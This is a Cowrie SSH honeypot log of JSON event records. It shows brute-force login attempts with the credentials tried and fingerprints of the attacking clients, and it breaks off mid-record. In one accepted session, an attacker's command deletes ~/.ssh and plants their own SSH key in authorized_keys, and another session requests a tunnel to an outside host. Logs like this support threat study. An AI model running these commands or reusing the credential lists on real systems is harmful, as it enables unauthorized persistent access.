{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:42:16.065642Z","src_ip":"212.227.235.229","session":"23293c2006e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:42:16.152813Z","src_ip":"212.227.235.229","session":"23293c2006e0"}
{"eventid":"cowrie.login.failed","username":"adam","password":"adam@123","message":"login attempt [adam/adam@123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:42:16.543459Z","src_ip":"212.227.235.229","session":"23293c2006e0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:42:16.588023Z","src_ip":"157.20.207.165","session":"e6839389d36e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:42:17.632412Z","src_ip":"212.227.235.229","session":"23293c2006e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42823,"dst_ip":"1.2.3.4","dst_port":22,"session":"f16530970e48","protocol":"ssh","message":"New connection: 212.227.235.229:42823 (1.2.3.4:22) [session: f16530970e48]","sensor":"my-vps","timestamp":"2025-09-09T06:42:18.435216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:42:18.436264Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:42:18.680071Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.login.success","username":"root","password":"Zxcvbnm!@#123","message":"login attempt [root/Zxcvbnm!@#123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:42:19.698481Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:42:20.253511Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:42:20.254726Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:42:20.255726Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:42:20.501441Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:42:21.007346Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:42:21.008074Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:42:21.254266Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:42:21.255146Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43420,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0662873bda1","protocol":"ssh","message":"New connection: 212.227.235.229:43420 (1.2.3.4:22) [session: c0662873bda1]","sensor":"my-vps","timestamp":"2025-09-09T06:42:21.494471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:42:21.495142Z","src_ip":"212.227.235.229","session":"c0662873bda1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:42:21.736229Z","src_ip":"212.227.235.229","session":"c0662873bda1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:42:22.746469Z","src_ip":"212.227.235.229","session":"c0662873bda1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:42:23.989496Z","src_ip":"212.227.235.229","session":"c0662873bda1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43882,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8c1b40a1c32","protocol":"ssh","message":"New connection: 212.227.235.229:43882 (1.2.3.4:22) [session: f8c1b40a1c32]","sensor":"my-vps","timestamp":"2025-09-09T06:42:24.233025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:42:24.233771Z","src_ip":"212.227.235.229","session":"f8c1b40a1c32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:42:24.477661Z","src_ip":"212.227.235.229","session":"f8c1b40a1c32"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:42:25.490329Z","src_ip":"212.227.235.229","session":"f8c1b40a1c32"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:42:25.734054Z","src_ip":"212.227.235.229","session":"f16530970e48"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:42:25.735240Z","src_ip":"212.227.235.229","session":"f8c1b40a1c32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56092,"dst_ip":"1.2.3.4","dst_port":22,"session":"efa458ca25f6","protocol":"ssh","message":"New connection: 212.227.235.229:56092 (1.2.3.4:22) [session: efa458ca25f6]","sensor":"my-vps","timestamp":"2025-09-09T06:42:27.035398Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:42:27.036462Z","src_ip":"212.227.235.229","session":"efa458ca25f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56468,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4e683b2a128","protocol":"ssh","message":"New connection: 212.227.235.229:56468 (1.2.3.4:22) [session: c4e683b2a128]","sensor":"my-vps","timestamp":"2025-09-09T06:42:27.135197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:42:27.136039Z","src_ip":"212.227.235.229","session":"c4e683b2a128"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T06:42:27.266434Z","src_ip":"212.227.235.229","session":"c4e683b2a128"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:42:27.659479Z","src_ip":"212.227.235.229","session":"c4e683b2a128"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T06:42:27.791664Z","session":"c4e683b2a128"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65279,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b356db2a41b","protocol":"ssh","message":"New connection: 212.227.235.229:65279 (1.2.3.4:22) [session: 1b356db2a41b]","sensor":"my-vps","timestamp":"2025-09-09T06:42:36.478091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:42:36.479069Z","src_ip":"212.227.235.229","session":"1b356db2a41b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:42:36.594016Z","src_ip":"212.227.235.229","session":"1b356db2a41b"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T06:42:37.068993Z","src_ip":"212.227.235.229","session":"1b356db2a41b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:42:38.187457Z","src_ip":"212.227.235.229","session":"1b356db2a41b"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":34200,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b42c389b3a3","protocol":"ssh","message":"New connection: 118.26.39.178:34200 (1.2.3.4:22) [session: 6b42c389b3a3]","sensor":"my-vps","timestamp":"2025-09-09T06:42:56.322510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:42:56.325027Z","src_ip":"118.26.39.178","session":"6b42c389b3a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:42:57.560249Z","src_ip":"118.26.39.178","session":"6b42c389b3a3"}
{"eventid":"cowrie.login.failed","username":"localhost","password":"qwerty","message":"login attempt [localhost/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T06:42:58.331980Z","src_ip":"118.26.39.178","session":"6b42c389b3a3"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:42:59.591098Z","src_ip":"118.26.39.178","session":"6b42c389b3a3"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":41648,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e8ec2dfe92d","protocol":"ssh","message":"New connection: 157.20.207.165:41648 (1.2.3.4:22) [session: 0e8ec2dfe92d]","sensor":"my-vps","timestamp":"2025-09-09T06:43:25.706497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:43:25.707179Z","src_ip":"157.20.207.165","session":"0e8ec2dfe92d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:43:25.891346Z","src_ip":"157.20.207.165","session":"0e8ec2dfe92d"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456789","message":"login attempt [developer/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T06:43:26.670368Z","src_ip":"157.20.207.165","session":"0e8ec2dfe92d"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:43:27.857219Z","src_ip":"157.20.207.165","session":"0e8ec2dfe92d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55684,"dst_ip":"1.2.3.4","dst_port":22,"session":"5887572c9ac0","protocol":"ssh","message":"New connection: 212.227.235.229:55684 (1.2.3.4:22) [session: 5887572c9ac0]","sensor":"my-vps","timestamp":"2025-09-09T06:43:32.660357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:43:32.661497Z","src_ip":"212.227.235.229","session":"5887572c9ac0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh